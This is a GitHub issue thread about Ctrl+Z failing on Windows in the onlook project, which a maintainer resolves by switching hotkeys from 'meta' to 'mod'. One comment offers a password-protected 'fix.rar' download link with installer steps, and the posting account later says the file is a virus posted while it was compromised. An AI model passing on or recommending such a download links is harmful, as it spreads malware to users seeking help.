### ISSUE TITLE
[Bug] Control+z Error

### ISSUE THREAD

**Issue by TroyRobinson** [onlook-dev/onlook#224]
#### Describe the bug

Control+z doesn't work on Windows. Sometimes control+z doesn't even work when using the UI.

P.S. Awesome work so far!

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kitenite** [comment]
Seems like we should be using mod instead of meta for hotkeys
https://react-hotkeys-hook.vercel.app/docs/documentation/useHotkeys/basic-usage#multiple-hotkeys

**Comment by Kitenite** [comment]
Should be fixed, please re-open if this issue persists :) @TroyRobinson

**Comment by TroyRobinson** [comment]
Thank you, Kiet!

Troy Robinson
UX & Web Development Consulting
Lionsrock.com

**Comment by MinecraftEarthVillage** [comment]
不要下载我前段时间发的文件，那不是我发的，是另一个人控制我，如果你使用了这个病毒文件，你也会被控制，并且疯狂转发这个病毒
Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.
